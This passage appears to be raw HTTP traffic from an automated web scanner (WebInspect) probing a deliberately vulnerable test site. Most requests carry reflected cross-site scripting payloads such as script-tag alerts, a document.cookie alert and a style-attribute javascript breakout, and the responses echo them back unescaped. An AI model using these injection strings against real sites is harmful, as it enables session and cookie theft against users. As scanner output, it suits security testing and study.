Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /forgot2.asp?msg2=no&msg=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1862
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">test@<script>alert(document.cookie)</script>.com</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /admin/help.cgi HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Connection: closed
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 17:02:31 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:46:59 GMT
ETag: "a43861f7a9dc11:8f6"
Content-Length: 46
<HTML></HTML>bleh exploit :0:0:
[boot loader]GET /login/login.asp?Action=Login&UserName=333%2D333%2D3333test@test999.com&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 351
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: 333-333-3333test@test999.com</h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /error.html HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:18 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "45f49c1a8dc11:8f6"
Content-Length: 125
<html>
<body>
Error Diagnostic Information<br><br>
<A href="/default.asp">The welcome page</A><br>
<br>
</body>
</html>POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 194
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was </textarea><script>alert('XSS')</script>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 11
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
cboPage=pc1HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:46 GMT
X-Powered-By: ASP.NET
Location: p1.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /join.asp?name=&email=&surname=</textarea><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=--><script>alert('XSS')</script>&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=1"style="background:url(javascript:alert('XSS'))"%20"&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:25 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:12 GMT
ETag: "d0f2f5fea9dc11:8f6"
Content-Length: 39
<A HREF="./link14/index.htm">Link14</A>GET /join.asp?name=&email=&surname=&house=</textarea><script>alert('XSS')</script>&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
